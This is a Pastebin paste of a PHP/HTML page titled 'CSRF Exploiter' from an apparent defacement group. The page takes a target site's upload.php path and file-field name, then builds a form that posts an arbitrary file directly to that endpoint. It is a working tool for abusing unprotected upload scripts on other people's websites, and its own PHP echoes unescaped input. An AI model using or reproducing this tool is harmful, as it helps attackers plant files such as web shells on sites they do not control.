Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <link href="https://fonts.googleapis.com/css?family=Rajdhani:700" rel="stylesheet">
- <link href="https://fonts.googleapis.com/css?family=Bungee|Keania+One|Simonetta:900" rel="stylesheet">
- <link href="" rel="stylesheet" type="text/css">
- <title>CSRF Expoiter</title>
- <style>
- body{
- font-family: 'Rajdhani', sans-serif;
- background-image: url("");
- color:#8001f1;
- background-attachment:fixed;
- background-repeat:no-repeat;
- background-position:center;
- background-color: black;
- -webkit-background-size: 100% 100%;
- }
- #content tr:hover{
- background-color: #BD29FF;
- text-shadow:1px 0px 0px #000;
- }
- #content .first{
- background-color: #BD29FF;
- font-weight: bold;
- }
- h1{
- color:red;
- font-family: "Bungee", cursive;
- -webkit-text-stroke: 0px #5ddcfc;
- }
- table{
- border: 1px red solid;
- background-color:black;
- border-radius:4px;
- }
- border{
- border: 1px #9435dd solid;
- }
- a{
- color:red;
- text-decoration: none;
- }
- select,textarea{
- font-family: 'Rajdhani', sans-serif;
- color:#8001f1;
- border: 1px red solid;
- background-color:black;
- padding:5px 8px;
- -moz-border-radius: 0px;
- -webkit-border-radius:0px;
- border-radius:0px;
- }
- input{
- color:#8001f1;
- font-family: 'Rajdhani', sans-serif;
- border: 1px red solid;
- background-color:black;
- padding:5px 25px;
- -moz-border-radius: 0px;
- border-radius:0px;
- }
- </style>
- </head>
- <body>
- <center>
- <img src="http://oi68.tinypic.com/29kqlb6.jpg" width="450" height="450"></center>
- <br>
- <table align="center" border="1px" width="500">
- <tr class="first">
- <td><center>♆ CSRF EXPLOITER ONLINE ♆</peller></center></td></tr>
- <tr><td><form method="post">
- Site Target :<input type="text" name="url" size="70" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
- POST File : <input type="text" name="pf" size="70" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><hr color="red">
- <center><input type="submit" name="d" value="Kunci"></center>
- <hr color="red">
- </form>
- <center>
- <?php
- $url = $_POST['url'];
- $pf = $_POST['pf'];
- $d = $_POST['d'];
- if($d) {
- echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
- }
- ?>
- </td></tr></table></center>
- </form>
- <Br><br><br><Br><br><br><Br><br><br>
- <center><footer>
- <ul>
- <a href="#"><font size="5">[ Kontak Admin ]</a>
- <a href="#">[ Download File ]</a>
- <a href="#">[About ]</a>
- </ul>
- </footer>
- </center>
- <center><font size="3">copyright © 2019 - XfristZ Team</font></center>
- </body>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement